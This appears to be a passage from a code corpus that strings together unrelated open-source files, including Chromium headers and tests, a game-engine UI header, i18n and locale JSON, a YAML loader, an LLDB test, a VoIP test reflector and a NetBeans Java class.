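    letter_positions = [i for i, c in enumerate(text) if c.isascii() and c.isalpha()]
    variants = []
    for permutation in range(1 << len(letter_positions)):   # 2**letter_count variants
        chars = list(text)
        for bit, index in enumerate(letter_positions):
            if permutation & (1 << bit):
                chars[index] = chars[index].upper()
            else:
                chars[index] = chars[index].lower()
        variants.append(''.join(chars))
    return variants

# case_combinations('a-b') -> ['a-b', 'A-b', 'a-B', 'A-B']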
2,151
<reponame>google-ar/chromium // Copyright 2016 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #ifndef CONTENT_PUBLIC_BROWSER_RESTORE_TYPE_H_ #define CONTENT_PUBLIC_BROWSER_RESTORE_TYPE_H_ namespace content { // Enumerations of the possible restore types. enum class RestoreType { // Restore from the previous session. LAST_SESSION_EXITED_CLEANLY, LAST_SESSION_CRASHED, // The entry has been restored from the current session. This is used when // the user issues 'reopen closed tab'. CURRENT_SESSION, // The entry was not restored. NONE }; } // namespace content #endif // CONTENT_PUBLIC_BROWSER_RESTORE_TYPE_H_
239
441
<reponame>ssinai1/rbfx // // Copyright (c) 2017-2020 the rbfx project. // // Permission is hereby granted, free of charge, to any person obtaining a copy // of this software and associated documentation files (the "Software"), to deal // in the Software without restriction, including without limitation the rights // to use, copy, modify, merge, publish, distribute, sublicense, and/or sell // copies of the Software, and to permit persons to whom the Software is // furnished to do so, subject to the following conditions: // // The above copyright notice and this permission notice shall be included in // all copies or substantial portions of the Software. // // THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR // IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, // FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE // AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER // LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, // OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN // THE SOFTWARE. // #pragma once #include "../Scene/LogicComponent.h" namespace Rml { class ElementDocument; } namespace Urho3D { class RmlCanvasComponent; struct RmlCanvasResizedArgs; struct RmlDocumentReloadedArgs; class RmlUI; /// Adds a single window to game screen. class URHO3D_API RmlUIComponent : public LogicComponent { URHO3D_OBJECT(RmlUIComponent, LogicComponent); public: /// Construct. explicit RmlUIComponent(Context* context); /// Destruct. ~RmlUIComponent() override; /// Registers object with the engine. static void RegisterObject(Context* context); /// Set resource path of rml file defining a window. void SetResource(const ResourceRef& resourceRef); /// Set resource path of rml file defining a window. void SetResource(const ea::string& resourceName); /// Returns a path to a rml file defining a window. const ResourceRef& GetResource() const { return resource_; } /// Returns true if window is open, false otherwise. May return true when component is detached from a node and no window is open. bool IsOpen() const { return open_; } /// Set whether window opens as soon as component ias added to an object. void SetOpen(bool open); /// Return true if component is using normalized coordinates for window position and size. bool GetUseNormalizedCoordinates() const { return useNormalized_; } /// Enable or disable use of normalized coordinates for window position and size. void SetUseNormalizedCoordinates(bool enable) { useNormalized_ = enable; } /// Returns window position in pixels or normalized coordinates. Vector2 GetPosition() const; /// Sets window position in pixels or normalized coordinates. void SetPosition(Vector2 pos); /// Returns window size in pixels or normalized coordinates. Vector2 GetSize() const; /// Sets window size in pixels or normalized coordinates. void SetSize(Vector2 size); /// Enable auto-sizing based on rml document contents. void SetAutoSize(bool enable) { autoSize_ = enable; } /// Return true if window automatically resizes based on rml document contents. bool GetAutoSize() const { return autoSize_; } /// Return RmlUI subsystem this component renders into. RmlUI* GetUI() const; protected: /// Handle component being added to Node or removed from it. void OnNodeSet(Node* node) override; /// Open a window document if it was not already open. void OpenInternal(); /// Close a window document if it was open. 
void CloseInternal(); /// Resets document_ pointer when window is closed. void OnDocumentClosed(Rml::ElementDocument* document); /// Reposition UI elements on UI canvas resize. void OnUICanvasResized(const RmlCanvasResizedArgs& size); /// Handle document pointer changes on resource reload. void OnDocumentReloaded(const RmlDocumentReloadedArgs& args); /// Handle addition of sibling components. void OnComponentAdded(StringHash, VariantMap& args); /// Handle removal of sibling components. void OnComponentRemoved(StringHash, VariantMap& args); protected: /// A rml file resource. ResourceRef resource_; /// Flag indicating that window will open as soon as component is added to an object. bool open_ = false; /// Currently open document. Null if document was closed. Rml::ElementDocument* document_ = nullptr; /// Flag indicating that component will save normalized coordinates. When not set, component will save pixel coordinates. bool useNormalized_ = false; /// Used to store size when document is not available. Vector2 size_; /// Used to store position when document is not available. Vector2 position_; /// Use automatic size inherited from rml document. bool autoSize_ = true; /// Component which holds RmlUI instance containing UI managed by this component. May be null if UI is rendered into default RmlUI subsystem. WeakPtr<RmlCanvasComponent> canvasComponent_; }; }
1,461
524
#pragma once #include "ContactList.h" #include "../../animation/animation.h" namespace Logic { class CustomAbstractListModel; class SearchModel; class SearchItemDelegate; enum class UpdateChatSelection; class CommonChatsModel; } namespace Ui { class FocusableListView; class SearchWidget; class ContextMenu; class ContactListWidget : public QWidget { Q_OBJECT Q_SIGNALS: void searchEnd(); void itemSelected(const QString& _aimid, qint64 _msgid, qint64 _quoteid); void liveChatSelected(const QString& _aimid); void itemClicked(const QString&); void groupClicked(int); void changeSelected(const QString&); void searchSuggestSelected(const QString& _pattern); void searchSuggestRemoved(const QString& _contact, const QString& _pattern); void clearSearchSelection(); //sidebar void selected(const QString&); void removeClicked(const QString&); void moreClicked(const QString&); void approve(const QString, bool); public: ContactListWidget(QWidget* _parent, const Logic::MembersWidgetRegim& _regim, Logic::CustomAbstractListModel* _chatMembersModel, Logic::AbstractSearchModel* _searchModel = nullptr, Logic::CommonChatsModel* _commonChatsModel = nullptr); ~ContactListWidget(); void connectSearchWidget(SearchWidget* _widget); void installEventFilterToView(QObject* _filter); void setIndexWidget(int index, QWidget* widget); void setClDelegate(Logic::AbstractItemDelegateWithRegim* _delegate); void setWidthForDelegate(int _width); void setDragIndexForDelegate(const QModelIndex& _index); void setPictureOnlyForDelegate(bool _value); void setEmptyIgnoreLabelVisible(bool _isVisible); void setSearchInDialog(const QString& _contact, bool _switchModel = true); bool getSearchInDialog() const; const QString& getSearchInDialogContact() const; bool isSearchMode() const; QString getSelectedAimid() const; Logic::MembersWidgetRegim getRegim() const; void setRegim(const Logic::MembersWidgetRegim _regim); Logic::AbstractSearchModel* getSearchModel() const; FocusableListView* getView() const; void triggerTapAndHold(bool _value); bool tapAndHoldModifier() const; void showSearch(); void rewindToTop(); public Q_SLOTS: void searchResult(); void searchUpPressed(); void searchDownPressed(); void selectionChanged(const QModelIndex &); void select(const QString&); void select(const QString&, const qint64 _message_id, const qint64 _quote_id, Logic::UpdateChatSelection _mode); void showContactsPopupMenu(const QString& aimId, bool _is_chat); private Q_SLOTS: void onItemClicked(const QModelIndex&); void onItemPressed(const QModelIndex&); void onMouseMoved(const QPoint& _pos, const QModelIndex& _index); void onMouseWheeled(); void onMouseWheeledStats(); void onSearchResults(); void onSearchSuggests(); void searchResults(const QModelIndex &, const QModelIndex &); void searchClicked(const QModelIndex& _current); void showPopupMenu(QAction* _action); void onSearchInputCleared(); void searchPatternChanged(const QString&); void onDisableSearchInDialog(); void touchScrollStateChanged(QScroller::State _state); void scrollToCategory(const SearchCategory _category); void scrollToItem(const QString& _aimId); void removeSuggestPattern(const QString& _contact, const QString& _pattern); void showPlaceholder(); void hidePlaceholder(); void showNoSearchResults(); void hideNoSearchResults(); void showSearchSpinner(); void hideSearchSpinner(); void scrolled(const int _value); private: void switchToInitial(bool _initial); void searchUpOrDownPressed(bool _isUp); void setKeyboardFocused(bool _isFocused); void initSearchModel(Logic::AbstractSearchModel* 
_searchModel); bool isSelectMembersRegim() const; void selectCurrentSearchCategory(); using SearchHeaders = std::vector<std::pair<SearchCategory, QModelIndex>>; SearchHeaders getCurrentCategories() const; private: QVBoxLayout* layout_; QVBoxLayout* viewLayout_; FocusableListView* view_; EmptyIgnoreListLabel* emptyIgnoreListLabel_; DialogSearchViewHeader* dialogSearchViewHeader_; GlobalSearchViewHeader* globalSearchViewHeader_; anim::Animation scrollToItemAnim_; std::string scrollStatWhere_; QTimer* scrollStatsTimer_; Logic::AbstractItemDelegateWithRegim* clDelegate_; Logic::AbstractItemDelegateWithRegim* searchDelegate_; QWidget* contactsPlaceholder_; QWidget* noSearchResults_; QWidget* searchSpinner_; QWidget* viewContainer_; Logic::MembersWidgetRegim regim_; Logic::CustomAbstractListModel* chatMembersModel_; Logic::AbstractSearchModel* searchModel_; Logic::ContactListWithHeaders* clModel_; Logic::CommonChatsModel* commonChatsModel_; ContextMenu* popupMenu_; QString searchDialogContact_; bool noSearchResultsShown_; bool initial_; bool tapAndHold_; }; }
2,136
814
{ "menu.search.placeholder": "Search for people, file, photos...", "menu.fullscreen": "Fullscreen", "menu.fullscreen.exit": "Exit Fullscreen", "menu.clear.local.storage": "Clear Local Storage", "menu.lang": "Language", "menu.account": "Personal Page", "menu.account.center": "Personal Center", "menu.account.settings": "Personal Settings", "menu.account.trigger": "Trigger Error", "menu.account.logout": "Logout", "menu.nav": "Navigation", "menu.nav.home": "Home", "menu.nav.docs": "Documents", "menu.nav.permission": "Permission", "menu.nav.permission.identity": "Authentication", "menu.nav.permission.identity.user": "Users", "menu.nav.permission.identity.role": "Roles", "menu.nav.permission.identity.user-role": "UserRoles", "menu.nav.permission.auth": "Authorization", "menu.nav.permission.auth.module": "Modules", "menu.nav.permission.auth.function": "Functions", "menu.nav.permission.auth.role-function": "RoleFunctions", "menu.nav.permission.auth.user-function": "UserFunctions", "menu.nav.permission.auth.entityinfo": "EntityInfos", "menu.nav.permission.auth.role-entityinfo": "RoleEntityInfos", "menu.nav.system": "System", "menu.nav.system.systems": "Systems", "menu.nav.system.systems.audit-operation": "Operation Audit", "menu.nav.system.systems.audit-entity": "Data Audit", "menu.nav.system.systems.settings": "System Settings", "menu.nav.system.systems.data-dictionary": "Data Dictionary", "menu.nav.system.systems.pack": "Packs", "menu.nav.business": "Business", "app.passport.login": "Login", "app.passport.register": "Register", "app.passport.forgot-password": "Forgot Password", "app.passport.lock": "Lock", "app.login.message-invalid-credentials": "Invalid username or password(admin/ant.design)", "app.login.message-invalid-verification-code": "Invalid verification code", "app.login.tab-login-credentials": "Credentials", "app.login.tab-login-mobile": "Mobile number", "app.login.remember-me": "Remember me", "app.login.forgot-password": "Forgot your password?", "app.login.sign-in-with": "Sign in with", "app.login.signup": "Sign up", "app.login.login": "Login", "app.login.username.placeholder": "username / email / cell number", "app.login.password.placeholder": "login password", "app.register.register": "Register", "app.register.get-verification-code": "Get code", "app.register.sign-in": "Already have an account?", "app.register-result.msg": "Account:registered at {{email}}", "app.register-result.activation-email": "The activation email has been sent to your email address and is valid for 24 hours. 
Please log in to the email in time and click on the link in the email to activate the account.", "app.register-result.back-home": "Back to home", "app.register-result.view-mailbox": "View mailbox", "validation.login.account.required": "Please enter your login account!", "validation.email.required": "Please enter your email!", "validation.email.wrong-format": "The email address is in the wrong format!", "validation.password.required": "Please enter your password!", "validation.password.twice": "The passwords entered twice do not match!", "validation.password.strength.msg": "Please enter at least 6 characters and don't use passwords that are easy to guess.", "validation.password.strength.strong": "Strength: strong", "validation.password.strength.medium": "Strength: medium", "validation.password.strength.short": "Strength: too short", "validation.confirm-password.required": "Please confirm your password!", "validation.phone-number.required": "Please enter your phone number!", "validation.phone-number.wrong-format": "Malformed phone number!", "validation.verification-code.required": "Please enter the verification code!", "validation.title.required": "Please enter a title", "validation.date.required": "Please select the start and end date", "validation.goal.required": "Please enter a description of the goal", "validation.standard.required": "Please enter a metric" }
1,284
496
# -*- coding: utf-8 -*- """Provides interface for pyfiscan to YAML-files.""" try: import os import sys import yaml except ImportError as error: print('Import error: %s' % error) sys.exit(1) def gen_yamlfile_locations(yamldir, includes): """File handle generator for YAML-files. Only used by database class.""" if os.path.islink(yamldir): sys.exit('Location for YAML-files can not be a symlink: %s' % yamldir) if not os.path.isdir(yamldir): sys.exit('Location for YAML-files is not a directory: %s' % yamldir) for entry in os.scandir(yamldir): filename = entry.name if filename.startswith('.'): # skip Vim swap files continue elif filename.endswith('~'): # skip Emacs temp files continue elif entry.is_symlink(): continue elif entry.is_dir(): continue elif not entry.is_file(): continue elif not includes and filename.endswith('.yml'): yield open(yamldir + filename, 'r') elif includes: for item in includes: if filename == item + '.yml': yield open(yamldir + filename, 'r') def generate(yamldir, includes): """Generates data dictionary of definitions from YAML files. Only used by database class. """ data = dict() for yamlfile in gen_yamlfile_locations(yamldir, includes): try: data.update(yaml.safe_load(yamlfile.read())) except AttributeError: # empty file sys.exit('No data found inside: %s' % yamlfile) except yaml.scanner.ScannerError as e: # syntax error sys.exit('Error while loading YAML-file: %s' % e) finally: yamlfile.close() return data class Database: """Reads YAML files and generates a data dictionary of the contents""" def __init__(self, yamldir, includes=None): self.issues = generate(yamldir, includes) def locations(self, application, with_lists=True): """Returns list of locations by appname.""" locations = [] for issue in self.issues[application].items(): location = issue[1]['location'] if with_lists is True: locations.append(location) else: if type(location) == str: locations.append(location) elif type(location) == list: locations.extend(location) return locations
1,141
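The pyfiscan Database class above loads issue definitions from a directory of YAML files. A hedged usage sketch follows; the directory name, file name, issue layout, and the database.py module name are illustrative assumptions, not pyfiscan's shipped data.

# Illustrative use of the Database class above; assumes the module is saved
# as database.py and that a YAML directory exists with one definition file.
import os
import yaml
from database import Database   # module name is an assumption

os.makedirs('yamls', exist_ok=True)
with open('yamls/exampleapp.yml', 'w') as handle:
    yaml.safe_dump({
        'ExampleApp': {
            'example-issue': {
                'location': ['/index.php', '/readme.txt'],
            },
        },
    }, handle)

db = Database('yamls/', includes=['exampleapp'])
print(db.locations('ExampleApp'))                     # [['/index.php', '/readme.txt']]
print(db.locations('ExampleApp', with_lists=False))   # ['/index.php', '/readme.txt']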
14,668
<gh_stars>1000+ // Copyright 2018 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #include "chrome/browser/policy/chrome_extension_policy_migrator.h" #include <string> #include "base/bind.h" #include "base/callback.h" #include "base/strings/utf_string_conversions.h" #include "base/values.h" #include "extensions/common/hashed_extension_id.h" #include "testing/gtest/include/gtest/gtest.h" #include "ui/base/l10n/l10n_util.h" namespace policy { namespace { const char kExtensionId[] = "abcdefghijklmnopabcdefghijklmnop"; const char kOldPolicy1[] = "OldPolicyOne"; const char kOldPolicy2[] = "OldPolicyTwo"; const char kOldPolicy3[] = "OldPolicyThree"; const char kOldPolicy4[] = "OldPolicyFour"; const char kOldPolicy5[] = "OldPolicyFive"; const char kNewPolicy1[] = "NewPolicyOne"; const char kNewPolicy2[] = "NewPolicyTwo"; const char kNewPolicy3[] = "NewPolicyThree"; const char kNewPolicy4[] = "NewPolicyFour"; const int kOldValue1 = 111; const int kOldValue2 = 222; const int kOldValue3 = 333; const int kOldValue4 = 444; const int kOldValue5 = 555; const int kNewValue3 = 999; const int kNewValue4 = 888; void MultiplyByTwo(base::Value* val) { *val = base::Value(val->GetInt() * 2); } void SetPolicy(PolicyMap* policy, const char* policy_name, base::Value value) { policy->Set(policy_name, POLICY_LEVEL_MANDATORY, POLICY_SCOPE_USER, POLICY_SOURCE_CLOUD, std::move(value), nullptr); } class TestingPolicyMigrator : public ChromeExtensionPolicyMigrator { public: void Migrate(PolicyBundle* bundle) override { using Migration = PolicyMigrator::Migration; const Migration migrations[] = { Migration(kOldPolicy1, kNewPolicy1), Migration(kOldPolicy2, kNewPolicy2), Migration(kOldPolicy3, kNewPolicy3), Migration(kOldPolicy4, kNewPolicy4, base::BindRepeating(&MultiplyByTwo)), }; CopyPoliciesIfUnset(bundle, extensions::HashedExtensionId(kExtensionId).value(), migrations); } }; } // namespace TEST(ChromeExtensionPolicyMigratorTest, CopyPoliciesIfUnset) { PolicyBundle bundle; PolicyMap& chrome_map = bundle.Get( PolicyNamespace(POLICY_DOMAIN_CHROME, /* component_id */ std::string())); SetPolicy(&chrome_map, kNewPolicy3, base::Value(kNewValue3)); PolicyMap& extension_map = bundle.Get(PolicyNamespace(POLICY_DOMAIN_EXTENSIONS, kExtensionId)); SetPolicy(&extension_map, kOldPolicy1, base::Value(kOldValue1)); SetPolicy(&extension_map, kOldPolicy2, base::Value(kOldValue2)); SetPolicy(&extension_map, kOldPolicy3, base::Value(kOldValue3)); SetPolicy(&extension_map, kOldPolicy4, base::Value(kOldValue4)); SetPolicy(&extension_map, kOldPolicy5, base::Value(kOldValue5)); TestingPolicyMigrator().Migrate(&bundle); // Policies in kMigrations should be renamed + copied into the Chrome domain. EXPECT_EQ(4u, chrome_map.size()); ASSERT_TRUE(chrome_map.GetValue(kNewPolicy1)); EXPECT_EQ(base::Value(kOldValue1), *chrome_map.GetValue(kNewPolicy1)); ASSERT_TRUE(chrome_map.GetValue(kNewPolicy2)); EXPECT_EQ(base::Value(kOldValue2), *chrome_map.GetValue(kNewPolicy2)); // kNewPolicy3 is already set, and should not be overwritten. ASSERT_TRUE(chrome_map.GetValue(kNewPolicy3)); EXPECT_EQ(base::Value(kNewValue3), *chrome_map.GetValue(kNewPolicy3)); // This policy was transformed by MultiplyByTwo. 
ASSERT_TRUE(chrome_map.GetValue(kNewPolicy4)); EXPECT_EQ(base::Value(kNewValue4), *chrome_map.GetValue(kNewPolicy4)); } TEST(ChromeExtensionPolicyMigratorTest, DeprecatedWarnings) { PolicyBundle bundle; PolicyMap& chrome_map = bundle.Get( PolicyNamespace(POLICY_DOMAIN_CHROME, /* component_id */ std::string())); PolicyMap& extension_map = bundle.Get(PolicyNamespace(POLICY_DOMAIN_EXTENSIONS, kExtensionId)); SetPolicy(&extension_map, kOldPolicy1, base::Value(kOldValue1)); TestingPolicyMigrator().Migrate(&bundle); // Policies in kMigrations should be renamed + copied into the Chrome domain. EXPECT_EQ(1u, chrome_map.size()); ASSERT_TRUE(chrome_map.GetValue(kNewPolicy1)); base::RepeatingCallback<std::u16string(int)> l10nlookup = base::BindRepeating(&l10n_util::GetStringUTF16); EXPECT_FALSE( chrome_map.Get(kNewPolicy1) ->GetLocalizedMessages(PolicyMap::MessageType::kWarning, l10nlookup) .empty()); } } // namespace policy
1,685
605
# TestCGImportedTypes.py # # This source file is part of the Swift.org open source project # # Copyright (c) 2014 - 2016 Apple Inc. and the Swift project authors # Licensed under Apache License v2.0 with Runtime Library Exception # # See https://swift.org/LICENSE.txt for license information # See https://swift.org/CONTRIBUTORS.txt for the list of Swift project authors # # ------------------------------------------------------------------------------ """ Test that we are able to deal with C-imported types (from CoreGraphics) """ import lldb from lldbsuite.test.lldbtest import * from lldbsuite.test.decorators import * import lldbsuite.test.lldbutil as lldbutil import os import unittest2 class TestSwiftCGImportedTypes(TestBase): mydir = TestBase.compute_mydir(__file__) def setUp(self): TestBase.setUp(self) @skipUnlessDarwin @swiftTest def test_swift_cg_imported_types(self): """Test that we are able to deal with C-imported types from CoreGraphics""" self.build() lldbutil.run_to_source_breakpoint( self, 'Set breakpoint here', lldb.SBFileSpec('main.swift')) rect = self.frame().FindVariable("cgrect") self.assertTrue(rect.IsValid(), "Got the cgrect variable") origin_var = rect.GetChildMemberWithName("origin") self.assertTrue(origin_var.IsValid(), "Got origin from cgrect") x_var = origin_var.GetChildMemberWithName("x") self.assertTrue(x_var.IsValid(), "Got valid x from cgrect.origin") x_native = x_var.GetChildMemberWithName("native") self.assertTrue( x_native.IsValid(), "Got valid native from cgrect.origin.x") self.assertEquals(x_native.GetValue(), "10", "Value of x is correct")
648
389
// // libtgvoip is free and unencumbered public domain software. // For more information, see http://unlicense.org or the UNLICENSE file // you should have received with this source code distribution. // #include "MockReflector.h" #include <arpa/inet.h> #include <assert.h> #include <stdio.h> using namespace tgvoip; using namespace tgvoip::test; struct UdpReflectorSelfInfo{ uint8_t peerTag[16]; uint64_t _id1=0xFFFFFFFFFFFFFFFFLL; uint32_t _id2=0xFFFFFFFF; uint32_t magic=0xc01572c7; int32_t date; uint64_t query_id; uint64_t my_ip_padding1; uint32_t my_ip_padding2; uint32_t my_ip; uint32_t my_port; } __attribute__((packed)); MockReflector::MockReflector(std::string bindAddress, uint16_t bindPort){ sfd=socket(PF_INET, SOCK_DGRAM, IPPROTO_UDP); assert(sfd!=-1); sockaddr_in bindAddr={0}; bindAddr.sin_family=AF_INET; bindAddr.sin_port=htons(bindPort); inet_aton(bindAddress.c_str(), &bindAddr.sin_addr); int res=bind(sfd, (struct sockaddr*)&bindAddr, sizeof(bindAddr)); assert(res==0); } MockReflector::~MockReflector(){ } std::array<std::array<uint8_t, 16>, 2> MockReflector::GeneratePeerTags(){ std::array<uint8_t, 16> tag1; for(int i=0;i<16;i++){ tag1[i]=(uint8_t)rand(); } tag1[15] &= 0xFE; std::array<std::array<uint8_t, 16>, 2> res; res[0]=tag1; std::copy(tag1.begin(), tag1.end(), res[1].begin()); res[1][15] |= 1; return res; } void MockReflector::Start(){ if(running) return; running=true; pthread_create(&thread, NULL, [](void* arg) -> void* { reinterpret_cast<MockReflector*>(arg)->RunThread(); return NULL; }, this); } void MockReflector::Stop(){ running=false; shutdown(sfd, SHUT_RDWR); close(sfd); pthread_join(thread, NULL); } void MockReflector::SetDropAllPackets(bool drop){ dropAllPackets=drop; } void MockReflector::RunThread(){ while(running){ std::array<uint8_t, 1500> buf; sockaddr_in addr; socklen_t addrlen=sizeof(addr); ssize_t len=recvfrom(sfd, buf.data(), sizeof(buf), 0, (struct sockaddr*)&addr, &addrlen); if(len<=0) return; if(len>=32){ std::array<uint8_t, 16> peerTag; int32_t specialID[4]; std::copy(buf.begin(), buf.begin()+16, peerTag.begin()); memcpy(specialID, buf.data()+16, 16); uint64_t tagID=*reinterpret_cast<uint64_t*>(peerTag.data()); ClientPair c=clients[tagID]; sockaddr_in* dest; if(peerTag[15] & 1){ c.addr1=addr; dest=&c.addr0; }else{ c.addr0=addr; dest=&c.addr1; } clients[tagID]=c; if(specialID[0]==-1 && specialID[1]==-1 && specialID[2]==-1){ if(specialID[3]==-1){ continue; }else if(specialID[3]==-2){ UdpReflectorSelfInfo response; memcpy(response.peerTag, peerTag.data(), 16); response.date=(int32_t)time(NULL); response.query_id=*reinterpret_cast<uint64_t*>(buf.data()+32); response.my_ip_padding1=0; response.my_ip_padding2=0xFFFF0000; response.my_ip=(uint32_t)addr.sin_addr.s_addr; response.my_port=ntohs(addr.sin_port); sendto(sfd, &response, sizeof(response), 0, (struct sockaddr*)&addr, sizeof(addr)); continue; } } if(dest->sin_family==AF_INET && !dropAllPackets){ if(peerTag[15] & 1) buf[15] &= 0xFE; else buf[15] |= 1; sendto(sfd, buf.data(), len, 0, (struct sockaddr*)dest, sizeof(sockaddr_in)); } } } }
1,539
457
<reponame>vico-aguado/intl {"NAME":"es_US","ERAS":["a. C.","d. C."],"ERANAMES":["antes de Cristo","después de Cristo"],"NARROWMONTHS":["E","F","M","A","M","J","J","A","S","O","N","D"],"STANDALONENARROWMONTHS":["E","F","M","A","M","J","J","A","S","O","N","D"],"MONTHS":["enero","febrero","marzo","abril","mayo","junio","julio","agosto","septiembre","octubre","noviembre","diciembre"],"STANDALONEMONTHS":["enero","febrero","marzo","abril","mayo","junio","julio","agosto","septiembre","octubre","noviembre","diciembre"],"SHORTMONTHS":["ene.","feb.","mar.","abr.","may.","jun.","jul.","ago.","sep.","oct.","nov.","dic."],"STANDALONESHORTMONTHS":["ene.","feb.","mar.","abr.","may.","jun.","jul.","ago.","sep.","oct.","nov.","dic."],"WEEKDAYS":["domingo","lunes","martes","miércoles","jueves","viernes","sábado"],"STANDALONEWEEKDAYS":["domingo","lunes","martes","miércoles","jueves","viernes","sábado"],"SHORTWEEKDAYS":["dom.","lun.","mar.","mié.","jue.","vie.","sáb."],"STANDALONESHORTWEEKDAYS":["dom.","lun.","mar.","mié.","jue.","vie.","sáb."],"NARROWWEEKDAYS":["D","L","M","M","J","V","S"],"STANDALONENARROWWEEKDAYS":["D","L","M","M","J","V","S"],"SHORTQUARTERS":["T1","T2","T3","T4"],"QUARTERS":["1.er trimestre","2.º trimestre","3.er trimestre","4.º trimestre"],"AMPMS":["a. m.","p. m."],"DATEFORMATS":["EEEE, d 'de' MMMM 'de' y","d 'de' MMMM 'de' y","d MMM y","d/M/y"],"TIMEFORMATS":["h:mm:ss a zzzz","h:mm:ss a z","h:mm:ss a","h:mm a"],"AVAILABLEFORMATS":null,"FIRSTDAYOFWEEK":6,"WEEKENDRANGE":[5,6],"FIRSTWEEKCUTOFFDAY":5,"DATETIMEFORMATS":["{1}, {0}","{1}, {0}","{1} {0}","{1} {0}"]}
685
335
{ "word": "Lost", "definitions": [ "Unable to find one's way; not knowing one's whereabouts.", "Unable to be found.", "Unable to understand or to cope with a situation.", "That has been taken away or cannot be recovered.", "(of time or an opportunity) not used advantageously; wasted.", "Having died or been destroyed.", "(of a game or contest) in which a defeat has been sustained." ], "parts-of-speech": "Adjective" }
180
1,056
<filename>enterprise/web.core/src/org/netbeans/modules/web/core/jsploader/JspServletDataObject.java<gh_stars>1000+ /* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package org.netbeans.modules.web.core.jsploader; import java.beans.PropertyChangeEvent; import java.beans.PropertyChangeListener; import java.beans.PropertyChangeSupport; import java.io.IOException; import org.openide.nodes.Node; import org.openide.util.Lookup; import org.openide.util.Task; import org.openide.text.Line; import org.openide.util.NbBundle; import org.netbeans.api.java.loaders.JavaDataSupport; import org.openide.cookies.EditorCookie; import org.openide.filesystems.FileObject; import org.openide.loaders.DataObject; import org.openide.loaders.DataObjectExistsException; import org.openide.loaders.DataObjectNotFoundException; import org.openide.loaders.MultiDataObject; import org.openide.loaders.MultiFileLoader; /** Dataobject representing a servlet generated from a JSP page * * @author <NAME> */ public final class JspServletDataObject extends MultiDataObject { public static final String EA_ORIGIN_JSP_PAGE = "NetBeansAttrOriginJspPage"; // NOI18N public JspServletDataObject(FileObject pf, MultiFileLoader loader) throws DataObjectExistsException { super(pf, loader); } @Override public Node createNodeDelegate() { return JavaDataSupport.createJavaNode(getPrimaryFile()); } @Override public Lookup getLookup() { return getCookieSet().getLookup(); } /** Get the name of the data object. * Uses the name of the source JSP * @return the name */ @Override public String getName () { DataObject jsp = getSourceJspPage(); if (jsp == null) return super.getName(); int markIndex = getPrimaryFile().getName().lastIndexOf(JspServletDataLoader.JSP_MARK); String fileIndex = (markIndex == -1) ? 
"" : getPrimaryFile().getName().substring( markIndex + JspServletDataLoader.JSP_MARK.length()); if (fileIndex.startsWith("_")) // NOI18N fileIndex = fileIndex.substring(1); if ("".equals(fileIndex)) { return NbBundle.getMessage(JspServletDataObject.class, "LBL_ServletDisplayNameNoNumber", jsp.getPrimaryFile().getName()); } else { return NbBundle.getMessage(JspServletDataObject.class, "LBL_ServletDisplayName", new Object[] {fileIndex, jsp.getPrimaryFile().getName()}); } } /** Sets the source JSP page for this servlet */ public void setSourceJspPage(DataObject jspPage) throws IOException { setSourceJspPage(getPrimaryFile(), jspPage); firePropertyChange(PROP_COOKIE, null, null); } public static void setSourceJspPage(FileObject generatedServlet, DataObject jspPage) throws IOException { generatedServlet.setAttribute(EA_ORIGIN_JSP_PAGE, jspPage.getPrimaryFile()); } /** Returns the source JSP page for this servlet */ public DataObject getSourceJspPage() { Object obj = getPrimaryFile().getAttribute(EA_ORIGIN_JSP_PAGE); if (obj instanceof DataObject) return (DataObject)obj; if (obj instanceof FileObject) { if (((FileObject)obj).isValid()) { try { return DataObject.find((FileObject)obj); } catch (DataObjectNotFoundException e) { //nothing to do } } } return null; } private static class ServletEditorCookie implements EditorCookie.Observable, PropertyChangeListener { private EditorCookie original; private JspServletDataObject servlet; private EditorCookie currentEditor; private PropertyChangeSupport pcs; public ServletEditorCookie(EditorCookie original, JspServletDataObject servlet) { this.original = original; this.servlet = servlet; pcs = new PropertyChangeSupport(this); } private EditorCookie currentEditorCookie() { EditorCookie newCurrent = computeCurrentEditorCookie(); if (currentEditor != newCurrent) { // re-register a property change listener to the new editor if ((currentEditor != null) && (currentEditor instanceof EditorCookie.Observable)) { ((EditorCookie.Observable)currentEditor).removePropertyChangeListener(this); } if ((newCurrent != null) && (newCurrent instanceof EditorCookie.Observable)) { ((EditorCookie.Observable)newCurrent).addPropertyChangeListener(this); } // remember the new editor currentEditor = newCurrent; } return currentEditor; } private EditorCookie computeCurrentEditorCookie() { DataObject jsp = servlet.getSourceJspPage(); if ((jsp != null) && (jsp instanceof JspDataObject)) { if (((JspDataObject)jsp).getServletDataObject() == servlet) { EditorCookie newCookie = ((JspDataObject) jsp).getServletEditor(); if (newCookie != null) return newCookie; } } return original; } // implementation of EditorCookie public Line.Set getLineSet() { return currentEditorCookie().getLineSet(); } public void open() { currentEditorCookie().open(); } public boolean close() { return currentEditorCookie().close(); } public Task prepareDocument() { return currentEditorCookie().prepareDocument(); } public javax.swing.text.StyledDocument openDocument() throws java.io.IOException { return currentEditorCookie().openDocument(); } public javax.swing.text.StyledDocument getDocument() { return currentEditorCookie().getDocument(); } public void saveDocument() throws java.io.IOException { currentEditorCookie().saveDocument(); } public boolean isModified() { return currentEditorCookie().isModified(); } public javax.swing.JEditorPane[] getOpenedPanes() { return currentEditorCookie().getOpenedPanes(); } // implementation of EditorSupport.Observable public void addPropertyChangeListener(PropertyChangeListener 